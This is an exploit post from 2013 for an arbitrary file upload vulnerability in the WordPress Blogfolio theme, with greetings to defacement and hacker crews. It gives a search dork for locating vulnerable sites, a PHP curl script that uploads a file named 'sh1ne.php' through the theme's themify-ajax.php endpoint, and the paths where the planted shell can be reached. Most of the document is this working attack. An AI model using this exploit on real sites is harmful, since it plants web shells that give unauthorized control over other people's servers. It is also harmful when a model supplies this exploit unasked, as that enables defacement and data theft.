#Title : WordPress Blogfolio Theme Arbitrary File Upload
#Author : eX-Sh1Ne
#Date : 23/11/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themify.me/
#Download : http://themify.me/themes/blogfolio
#Greetz : Java Defacer Team - Indonesian Cyber Army - No-Name Crew - Indonesian Hacker
#Thanks : Admin07 - Tintonz - pr0blemnymouz - FH04ZA - Black Style - AntonioHsH - Ice-Cream - Freezer22 - Raka 3r00t - All My Friends
#Tested : Mozila, Chrome-> Windows
#Vulnerabillity : Arbitrary File Upload
#Dork : inurl:wp-content/themes/blogfolio/
==================================================================

<?php
$uploadfile="sh1ne.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Shell Access -> 
http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php
or 
http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > find your shell